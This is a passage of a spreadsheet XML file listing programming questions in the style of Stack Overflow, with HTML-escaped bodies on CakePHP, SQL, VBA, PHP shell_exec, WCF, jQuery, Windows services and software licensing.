&lt;p&gt;And &lt;strong&gt;idlist&lt;/strong&gt; is empty. Note that if I use &lt;code&gt;INNER JOIN&lt;/code&gt; instead of &lt;code&gt;LEFT JOIN&lt;/code&gt; I get an empty result. Even though I am sure there are rows that meet the ON requirement.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I exclude records from an associated model in CakePHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating a Q&amp;amp;A application in CakePHP, and I want to exclude my associations in some cases. Imagine the following:&lt;/p&gt;
&lt;p&gt;I'm listing all questions on the first page using $this-&gt;Question-&gt;findAll();. Since I have the following association in my model:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public $hasMany = array('Answer' =&amp;gt;
    	array('className' =&amp;gt; 'Answer',
    		'order' =&amp;gt; 'Answer.created DESC',
    		'foreignKey' =&amp;gt; 'post_id',
    		'dependent' =&amp;gt; true,
    		'exclusive' =&amp;gt; false,
    	)
    );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All answers will get selected at the start page, which is not optimal. How could i do to exclude the answers in this particular method?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>algorithm to find maximum occurence of a substring</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a string S, what is the best algorithm to find a substring which repeats maximum number of times.&lt;/p&gt;
&lt;p&gt;For example, in "assdssfssd", it is "ss" which repeats maximum number of times.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting a font color in VBA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to set the font color of a cell to a specific RGB value.&lt;/p&gt;
&lt;p&gt;If I use&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ActiveCell.Color = RGB(255,255,0)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I do get yellow, but if I use a more exotic RGB value like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ActiveCell.Color = RGB(178, 150, 109)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I just get a grey color back.&lt;/p&gt;
&lt;p&gt;How come can't I just use any RGB value? And do you know any workarounds?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Elegantly determine if more than one boolean is "true"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a set of five boolean values. If more than one of these are true I want to excecute a particular function. What is the most elegant way you can think of that would allow me to check this condition in a single if() statement? Target language is C# but I'm interested in solutions in other languages as well (as long as we're not talking about specific built-in functions). &lt;/p&gt;
&lt;p&gt;One interesting option is to store the booleans in a byte, do a right shift and compare with the original byte. Something like &lt;code&gt;if(myByte &amp;amp;&amp;amp; (myByte &amp;gt;&amp;gt; 1))&lt;/code&gt; But this would require converting the separate booleans to a byte (via a bitArray?) and that seems a bit (pun intended) clumsy... &lt;em&gt;[edit]Sorry, that should have been&lt;/em&gt; &lt;code&gt;if(myByte &amp;amp; (myByte - 1))&lt;/code&gt; &lt;em&gt;[/edit]&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Note: This is of course very close to the classical "population count", "sideways addition" or "Hamming weight" programming problem - but not quite the same. I don't need to know how many of the bits are set, only if it is more than one. My hope is that there is a much simpler way to accomplish this. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>When installing my windows service, how can I programatically make it use a specific domain account</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a windows service that runs fine, but I have to have it run under a special user account.&lt;/p&gt;
&lt;p&gt;Currently I go into services and change the logon as section, but for deployment this has to be done more professionally.&lt;/p&gt;
&lt;p&gt;Is there a way for me to have it logon as a custom user account programatically, or during the installation process of the service?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recursive sql problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem that I would like have solved via a SQL query. This is going to
be used as a PoC (proof of concept).&lt;/p&gt;
&lt;p&gt;The problem:&lt;/p&gt;
&lt;p&gt;Product offerings are made up of one or many product instances, a product
instance can belong to many product offerings.
This can be realised like this in a table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PO | PI
-----
A | 10
A | 11
A | 12
B | 10
B | 11
C | 13
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I would like to get back the product offer from a set of product instances.
E.g. if we send in 10,11,13 the expected result back is B &amp;amp; C, and if we send in
only 10 then the result should be NULL since no product offering is made up of
only 10. Sending in 10,11,12 would result in A (not A &amp;amp; B since 12 is not a valid product offer in it self).&lt;/p&gt;
&lt;p&gt;Prerequisites:
The combination of product instances sent in can only result in one specific
combination of product offerings, so there is only one solution to each query.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ sql pass integer to sql string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have built a database in MS Access.
There I have a table called Customers which also has a cell called Employee type: integer.
I also built a program in C++ which controls all data.&lt;/p&gt;
&lt;p&gt;Let's say I have a string like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string sqlString = "SELECT * FROM Customers Where Customers.Employee = '" + id + "' ";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Id passes through my function correctly and is an integer, so I get an error in compilation saying: "Invalid pointer addition".&lt;/p&gt;
&lt;p&gt;If I declare id as a string of course there's no error but there are no results in my form also.  If I declare in database cell Employee as text and build my query like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string sqlString = "SELECT * FROM Customers WHERE Customers.Employee = 128";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get results, but I need that Employee as an integer cause its a foreign key from another table.&lt;/p&gt;
&lt;p&gt;So, what should I do with my query to have results passing integer as parameter through variable id, to be ok with the cell Employee from database which is also integer?
Any ideas? I would really appreciate some help here.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;As I said, if I convert id to string, there are no results in my form since Employee in database is an integer.  So this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;std::ostringstream buf;
buf &amp;lt;&amp;lt; "SELECT * FROM Customers Where Customers.Employee = '" &amp;lt;&amp;lt; id  &amp;lt;&amp;lt; "' ";
string str = buf.str();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;won't do the job or any other conversion.&lt;/p&gt;
&lt;p&gt;How can I pass id as an integer in my query?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I set the position of my datagrid scrollbar in my winforms app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my C# winforms app, I have a datagrid.  When the datagrid reloads, I want to set the scrollbar back to where the user had it set.  How can I do this?&lt;/p&gt;
&lt;p&gt;EDIT:  I'm using the old winforms DataGrid control, not the newer DataGridView&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Website's BIN directory and references</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Imagine the following solution:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Website ABC.com (not Web Application)&lt;/li&gt;
&lt;li&gt;BLL (business logic layer in a seperate assembly)&lt;/li&gt;
&lt;li&gt;DTO (dto objects in their own assembly)&lt;/li&gt;
&lt;li&gt;&lt;p&gt;DAL (data access layer in it's own assembly as well).&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The BLL has a reference to the DAL.&lt;/li&gt;
&lt;li&gt;The BLL has a reference to the DTO layer.&lt;/li&gt;
&lt;li&gt;The Website project references the BLL.&lt;/li&gt;
&lt;/ol&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When one compiles the website project, the following DLLs will appear in the BIN directory:&lt;br&gt;
BLL.dll&lt;br&gt;
DTO.dll&lt;br&gt;
DAL.dll  &lt;/p&gt;
&lt;p&gt;When one goes to preview the site, an error occurs about not having the necessary assembly references... Now if one right clicks on the website project, Add Reference, and explicitly add the reference to the missing assemblies, it will work fine.&lt;/p&gt;
&lt;p&gt;It seems to me like ASP.NET pulls the referenced assemblies of the referenced assembly being added/referenced in the website.  &lt;/p&gt;
&lt;p&gt;Why does one need to add explicit references to the references of the references... ? Sorry if I'm not wording this correctly or if it confusing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I debug a win32 process that unexpectedly terminates silently?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Windows application written in C++ that occasionally evaporates.  I use the word evaporate because there is nothing left behind: no "we're sorry" message from Windows, no crash dump from the Dr. Watson facility...&lt;/p&gt;
&lt;p&gt;On the one occasion the crash occurred under the debugger, the debugger did not break---it showed the application still running.  When I manually paused execution, I found that my process no longer had any threads.&lt;/p&gt;
&lt;p&gt;How can I capture the reason this process is terminating?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scaling a rich domain model</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Domain Driven Design encourages you to use a rich domain model. This means all the domain logic is located in the domain model, and that the domain model is supreme. Persistence becomes an external concern, as the domain model itself ideally knows nothing of persistence (e.g. the database).&lt;/p&gt;
&lt;p&gt;I've been using this in practice on a medium-size one-man project (&gt;100k lines of Java) and I'm discovering many advantages, mostly the flexibility and refactorability that this offers over a database-oriented approach. I can add and remove domain classes, hit a few buttons and an entire new database schema and SQL layer rolls out.&lt;/p&gt;
&lt;p&gt;However, I often face issues where I'm finding it difficult to reconcile the rich domain logic with the fact that there's an SQL database backing the application. In general, this results in the typical "1+N queries problem", where you fetch N objects, and then execute a nontrivial method on each object that again triggers queries. Optimizing this by hand allows you to do the process in a constant number of SQL queries.&lt;/p&gt;
&lt;p&gt;In my design I allow for a system to plug these optimized versions in. I do this by moving the code into a "query module" which contains dozens of domain-specific queries (e.g. getActiveUsers), of which I have both in-memory (naive and not scalable) and SQL-based (for deployment use) implementations. This allows me to optimize the hotspots, but there are two main disadvantages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I'm effectively moving some of my domain logic to places where it doesn't really belong, and in fact even pushing it into SQL statements.&lt;/li&gt;
&lt;li&gt;The process requires me to peruse query logs to find out where the hotspots are, after which I have to refactor the code, reducing its level abstraction by lowering it into queries.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Is there a better, cleaner way to reconcile Domain-Driven-Design and its Rich Domain Model with the fact that you can't have all your entities in memory and are therefore confined to a database backend?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Add web part programmatically to a Sharepoint Page and save values into the web part personalization store</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my project I programmatically create a web part page and add a web part to it using SPLimitedWebPartManager. I also want to set some properties for the web part and save it into the web part personalization scope. How can I access the personalization store for the web part. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I to properly handle spaces in PHP Shell_exec?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running on win2003 server, PHP 526, via the cmd-line.&lt;/p&gt;
&lt;p&gt;I have a cmdline string:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$cmd = '  "d:\Prog Files\foo.exe" -p "d:\data path\datadir"  ';
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Trying to do this in php code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$out = `$cmd`;       # note use of backticks AKA shell_exec
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;results in a failure by foo.exe as it interprets the -p arg as "d:\data".&lt;/p&gt;
&lt;p&gt;However, the same &lt;code&gt;$cdm&lt;/code&gt; string copied to the windows shell cmdline executes successfully.&lt;/p&gt;
&lt;p&gt;How do I properly handle spaces in PHP &lt;code&gt;shell_exec&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configuration binding extension could not be found</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created a simple wcf service which used the WCF Service Library template.  Everything works fine when using the default soap bindings, however when i attempt to modify the service to add a REST binding it fails with the following error:&lt;/p&gt;
&lt;p&gt;"Configuration binding extension 'system.serviceModel/bindings/webHttpBinding' could not be found. Verify that this binding extension is properly registered in system.serviceModel/extensions/bindingExtensions and that it is spelled correctly."&lt;/p&gt;
&lt;p&gt;I think i'm missing some very basic step here.  Can anyone help me out?&lt;/p&gt;
&lt;p&gt;The relevant snippits from my config file are below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;service name="WebService.Service1"&amp;gt;
  &amp;lt;endpoint address="" binding="webHttpBinding" contract="WebService.IService1" behaviorConfiguration="RestBehavior" /&amp;gt;
&amp;lt;/service&amp;gt;
&amp;lt;endpointBehaviors&amp;gt;
  &amp;lt;behavior name="RestBehavior"&amp;gt;
    &amp;lt;webHttp /&amp;gt;
  &amp;lt;/behavior&amp;gt;
&amp;lt;/endpointBehaviors&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Getting selected value from RadioButtonList</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;New to ASP.NET(C#)...&lt;/p&gt;
&lt;p&gt;I have a RadioButtonList on my page that is populated via DataBinding&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:RadioButtonList ID="rb" runat="server"&amp;gt;
&amp;lt;/asp:RadioButtonList&amp;gt;
&amp;lt;asp:Button Text="Submit" OnClick="submit" runat="server" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I get the value of the radio button that the user selected in my "submit" method?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Specify ordinals of C++ exported functions in a DLL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a DLL with mixed C/C++ code. I want to specify the ordinals of the functions I'm exporting. So I created a .DEF file that looks like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LIBRARY LEONMATH
EXPORTS
    sca_alloc   @1
    vec_alloc   @2
    mat_alloc   @3
    sca_free    @4
    vec_free    @5
    mat_free    @6
    ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to specify the ordinals of my C++ functions and class methods too. I have tried using the Dependency Walker to add the mangled names of my functions to the .DEF file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    ??0CScalar@@QAE@XZ      @25
    ??0CScalar@@QAE@O@Z     @26
    ??0CScalar@@QAE@ABV0@@Z @27
    ??1CScalar@@QAE@XZ      @28
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this has failed. Any ideas why this could be happening?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;EDIT:&lt;/b&gt; kauppi made a good observation, so I'm adding more information to the question.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Platform:&lt;/b&gt; Windows (and I'm not interested in portability)&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Compiler:&lt;/b&gt; Microsoft's C++ compiler (I'm using VS2005)&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Why I want to do this?:&lt;/b&gt; Using the ordinals has the advantage of letting me call exported C++ functions from C code.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Can BlackBerry COD or ALX files be decompiled?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I write Java software for a BlackBerry, can it be decompiled using freely available tools similar to &lt;a href="http://www.red-gate.com/products/reflector/" rel="nofollow"&gt;.NET Reflector&lt;/a&gt;, or is it a more elaborate process?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to add a description/comment to a table in Microsoft SQL 2000+</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to add a "metadata"-like description or comments to a table in Microsoft SQL 2000 and above?  &lt;/p&gt;
&lt;p&gt;How would you do this through the CREATE TABLE statement?&lt;/p&gt;
&lt;p&gt;Is it possible to add a description or comment to fields?&lt;/p&gt;
&lt;p&gt;How do you query this info back in MSSQL 2000? 2005?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DELPHI IDE - Stopping F12 from bring up the â€˜CPUâ€™ Window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am busy developing a Delphi App that uses F12&lt;/p&gt;
&lt;p&gt;When I am running the software under the Delphi IDE and press F12 the program stops and the â€˜CPUâ€™ window opens up&lt;/p&gt;
&lt;p&gt;What can I do to stop the Delphi IDE from doing  this when F12 is pressed ? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>UTF-8 file appending in vbscript/classicasp - can it be done?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My current knowledge:&lt;/p&gt;
&lt;p&gt;If you are trying to write text files in vbscript / asp land you have two options.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;the Scripting.FileSystemObject&lt;/li&gt;
&lt;li&gt;the ADODB.Stream object&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Scripting.FileSystemObject does not support utf8.  It will write in Ascii, or Unicode (and waste two bytes for most of your characters)&lt;/p&gt;
&lt;p&gt;ADODB.Stream does not support appending (afaik).  I can't figure out how to make the ADODB.Stream object actually open a file and write to it when I call stream.Write.  There is a SaveToFile function, but it outputs the entire stream.&lt;/p&gt;
&lt;p&gt;If you need to write 1GB files, you would have to fill the whole 1GB into the stream before you could write it out.&lt;/p&gt;
&lt;p&gt;Is there a special trick to get the ADODB.Stream object to &lt;em&gt;link&lt;/em&gt; to a file on disk?  I tried 
stream.Open "URL=file:///c:\test.txt"
but that gave an error.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Jquery - cannot select the parent div</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I hope this isn't a waste of time, however I have really been trying to figure this on out. Is it my syntax. I simply want to remove the parent div ".number-row" once the link with a class of ".remove-link" is clicked.&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;
$(document).ready(function(){
    $(".remove-link").click(function() {
        $(this).parent(".number-row").hide();
    })
})
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class="number-row" &amp;gt;
   &amp;lt;div class="number-column"&amp;gt;
         &amp;lt;div class="label-row"&amp;gt;
             Select Country:
         &amp;lt;/div&amp;gt;
         &amp;lt;div class="input-row"&amp;gt;
             &amp;lt;select&amp;gt;
                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;
                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;
             &amp;lt;/select&amp;gt;
         &amp;lt;/div&amp;gt;
         &amp;lt;div class="label-row"&amp;gt;
             Select Toll Free or City:
         &amp;lt;/div&amp;gt;
         &amp;lt;div class="input-row"&amp;gt;
             &amp;lt;select&amp;gt;
                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;
                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;
             &amp;lt;/select&amp;gt;
         &amp;lt;/div&amp;gt;
         &amp;lt;div class="label-row"&amp;gt;
             Select Your Number:
         &amp;lt;/div&amp;gt;
         &amp;lt;div class="input-row"&amp;gt;
             &amp;lt;select&amp;gt;
                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;
                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;
             &amp;lt;/select&amp;gt;
         &amp;lt;/div&amp;gt;
     &amp;lt;/div&amp;gt;
   &amp;lt;div class="number-column"&amp;gt;
         &amp;lt;div class="label-row"&amp;gt;
             Select Country:
         &amp;lt;/div&amp;gt;
         &amp;lt;div class="input-row"&amp;gt;
             &amp;lt;select&amp;gt;
                 &amp;lt;option&amp;gt;1&amp;lt;/option&amp;gt;
                 &amp;lt;option&amp;gt;2&amp;lt;/option&amp;gt;
             &amp;lt;/select&amp;gt;
         &amp;lt;/div&amp;gt;
         &amp;lt;div class="label-row"&amp;gt;
             Enter Number to Forward to:
         &amp;lt;/div&amp;gt;
         &amp;lt;div class="input-row"&amp;gt;
            &amp;lt;input type="text" name="forward_number" id="forward_number" /&amp;gt;
         &amp;lt;/div&amp;gt;
         &amp;lt;div class="number-row-options"&amp;gt;
            &amp;lt;a class="save-link" href="#"&amp;gt;Save&amp;lt;/a&amp;gt;
            &amp;lt;a class="remove-link" href="#"&amp;gt;Remove&amp;lt;/a&amp;gt;
         &amp;lt;/div&amp;gt;                    
     &amp;lt;/div&amp;gt;                    
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Trying to figure out how to set off an event when the enter key is pressed in a TextBox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The code I'm playing with is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;open System
open System.Windows.Forms
open System.Drawing
let tehform = new Form(Text = "STOP!", Width = 200, Height = 200)
let awe = new TextBox(Left = 1, Top = 30, Width = 100)
let stuff _ _ = MessageBox.Show(awe.Text) |&amp;gt; ignore
let handler = new EventHandler(stuff)
let yeah = new Button(Text = "", Left = 20, Top = 60, Width = 80)
yeah.Click.AddHandler(handler)
let ms = new MenuStrip()
let file = new ToolStripDropDownButton("File")
let ddi = file.DropDownItems.Add("Hi")
ddi.Click.AddHandler(handler) |&amp;gt; ignore
ms.Items.Add(file) |&amp;gt; ignore
let dc c = (c :&amp;gt; Control)
tehform.Controls.AddRange([| dc yeah; dc ms; dc awe |])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I thought, by looking at the library, I could use awe.OnEnter.AddHandler(handler) but that didn't work either. Thanks for the help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Will Server.Transfer work across AppDomains/Web Applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you have two applications residing on the same server, can you use Server.Transfer to load a page in a different AppDomain/Application?&lt;/p&gt;
&lt;p&gt;My guess is no, because Server.Transfer() copies HttpContext.Items, among other things. To copy this data between AppDomains, would cause threading and memory sharing concerns a in a world were thread isolation is strictly enforced. &lt;/p&gt;
&lt;p&gt;Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using ActiveRecord/NHibernate, can I Delete and Refresh without a Flush?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following Unit Test method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void TestOrderItemDelete()
{
    using (new SessionScope())
    {
        var order = Order.FindById(1234);
        var originalItemCount = order.OrderItems.Count;
        Assert.IsTrue(originalCount &amp;gt; 0);
        var itemToDelete = order.OrderItems[0];
        itemToDelete.DeleteAndFlush(); // itemToDelete.Delete();
        order.Refresh();
        Assert.AreEqual(originalCount - 1, order.OrderItems.Count);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see from the comment after the DeleteAndFlush command, I had to change it from a simple Delete to get the Unit test to pass.  Why is this?  The same is not true for my other unit test for adding an OrderItem.  This works just fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void TestOrderItemAdd()
{
    using (new SessionScope())
    {
        var order = Order.FindById(1234);
        var originalItemCount = order.OrderItems.Count;
        var itemToAdd = new OrderItem();
        itemToAdd.Order = order;
        itemToAdd.Create(); // Notice, this is not CreateAndFlush
        order.Refresh();
        Assert.AreEqual(originalCount + 1, order.OrderItems.Count);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All of this came up when I started using Lazy Instantiation of the Order.OrderItems relationship mapping, and had to add the using(new SessionScope) block around the test.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to bring files in a filesystem in/out MySQL DB?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The application that I am working on generates files dynamically with use.  This makes backup and syncronization between staging,development and production a real big challenge.  One way that we might get smooth solution (if feasable) is to have a script that at the moment of backing up the database can backup the dynamically generated files inside the database and in restore time can bring those file out of the database and in the filesystem again.&lt;/p&gt;
&lt;p&gt;I am wondering if there are any available (pay or free) application that could be use as scripts to make this happen. &lt;/p&gt;
&lt;p&gt;Basically if I have&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/usr/share/appname/server/dynamicdir
/usr/share/appname/server/otherdir/etc/resource.file
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then taking the examples above and with the script put them on the mysql database.&lt;/p&gt;
&lt;p&gt;Please let me know if you need more information.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Windows command shell that will display Unicode characters?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assuming I have fonts installed which have the appropriate glyphs in them, is there a command shell for Windows XP that will display Unicode characters? At a minimum, two things that should display Unicode correctly:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Directory listings. I don't care what I have to type (dir, ls, get-childitem, etc.), so long as files with Unicode characters in their names appear with the right glyphs, not the unprintable character box.&lt;/li&gt;
&lt;li&gt;Text file content listings. Again, doesn't matter to me if it's 'less', 'more', 'cat', 'dog', etc., so long as the characters are printed. I recognize that this is more complicated because of character encoding of the file, so if I have to specify that on the command line that's fine with me.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here's what I've tried so far:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;cmd.exe&lt;/li&gt;
&lt;li&gt;Windows PowerShell; including the multilingual version.&lt;/li&gt;
&lt;li&gt;Cygwin bash&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;No luck. I even tried installing &lt;a href="http://blogs.msdn.com/powershell/archive/2006/10/16/Windows-PowerShell-Font-Customization.aspx"&gt;custom fonts for cmd/PowerShell&lt;/a&gt;. PowerShell and cmd.exe seem to be Unicode-aware in the sense that I can copy/paste the non-printable box out of there and it will paste into other apps with the correct characters. Cygwin (?) seems to convert to the ? character and that comes through in the copy/paste.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Avoiding Inheritance Madness</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I have an API that I need to implement in to an existing framework.  This API manages interactions with an external server.  I've been charged with coming up with a way to create an easily repeatable "pattern," so that if people are working on new projects in the given framework they have a simple solution for integrating the API. &lt;/p&gt;
&lt;p&gt;My first idea was to create a class for your "main" class of the framework to extend that, would provide all the virtual functions necessary to interact with the API.  However, my boss vetoed this, since the existing framework is "inheritence heavy" and he wants to avoid adding to the madness.  I obviously can't incapsulate my API, because that is what the API itself is supposed to be doing, and doing so might hide functionality.  &lt;/p&gt;
&lt;p&gt;Short of asking futures developers to copy and paste my example, what do I do? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is this legal? (GPL Software / Licensing Issues)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work for a software / design firm and I recently found out that our "in house" CMS is actually &lt;a href="http://modxcms.com/"&gt;MODx&lt;/a&gt; that has been re-skinned by one of our designers. MODx is licensed under the &lt;a href="http://www.gnu.org/licenses/gpl-2.0.html"&gt;GPL Ver 2.&lt;/a&gt;. I would like to know if it is ethical / legal to be selling this to clients. &lt;/p&gt;
&lt;p&gt;We also offer another package that is actually &lt;a href="http://sourceforge.net/projects/zencart/"&gt;ZenCart&lt;/a&gt;, is this legal as well?&lt;/p&gt;
&lt;p&gt;I thought that software for commercial applications needed to be LGPL, are these applications being used "commercially"? We are certainly selling them to clients, while acting like they were developed in house...&lt;/p&gt;
&lt;p&gt;I'd love to hear your thought / clarifications on this topic, I for one find it at least unethical. What do you think?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Ruby, how does one get their IP octet without going through DNS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can, on some of my systems, get my IP address (192.68.m.n format) by doing this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;addr = IPSocket::getAddress(Socket.gethostname())
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...the trouble is that this only works if the name the local machine uses for itself is the name the DNS server associates with it.&lt;/p&gt;
&lt;p&gt;How *&amp;amp;#( hard can it be for ruby to just return its primary interface's IP address?  I have to do this in a platform-independant way or I'd just call ifconfig or ipconfig and parse it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do you consider before refactoring code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got an application that just shipped.  Since I wrote it, I've learned about amfphp and propel.  Both would be 'nice' to be used in the application but I can't say that it would be required at this point.&lt;/p&gt;
&lt;p&gt;What types of things do you consider before you refactor code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I write ints out to a text file with the low bits on the right side (Bigendian)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;By default the BinaryWriter class writes int values with the low bits on the left (e.g. (int)6 becomes 06 00 00 00 when the resulting file is viewed in a hex editor). I need the low bits on the right (e.g. 00 00 00 06). &lt;/p&gt;
&lt;p&gt;How do I achieve this?&lt;/p&gt;
&lt;p&gt;EDIT: Thanks strager for giving me the name for what I was looking for. I've edited the title and tags to make it easier to find.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you nest html forms?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to nest html forms like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form name="mainForm"&amp;gt;
  &amp;lt;form name="subForm"&amp;gt;
  &amp;lt;/form&amp;gt;
&amp;lt;/form&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so that both forms work? My friend is having problems with this, a part of the &lt;code&gt;subForm&lt;/code&gt; works, while another part of it does not.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Returning Array Fragments</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to get array fragments from an array.  I'm sick of using Array.Copy().
